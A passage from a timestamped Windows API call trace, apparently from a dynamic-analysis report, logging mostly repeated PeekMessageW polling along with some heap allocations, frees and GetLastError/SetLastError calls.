hHeap=0xbc0000) returned 1 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda6f0 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.475] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.475] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9bf8 | out: hHeap=0xbc0000) returned 1 [0257.476] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.476] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda6f0 | out: hHeap=0xbc0000) returned 1 [0257.476] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.476] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.476] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.476] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.476] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.476] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.476] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.476] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.476] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.476] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.476] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.476] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.476] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.477] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.478] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.479] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d620 | out: hHeap=0xbc0000) returned 1 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.480] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.481] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.482] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc3d5e0 | out: hHeap=0xbc0000) returned 1 [0257.483] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.483] GetLastError () returned 0x6 [0257.483] SetLastError (dwErrCode=0x6) [0257.483] GetLastError () returned 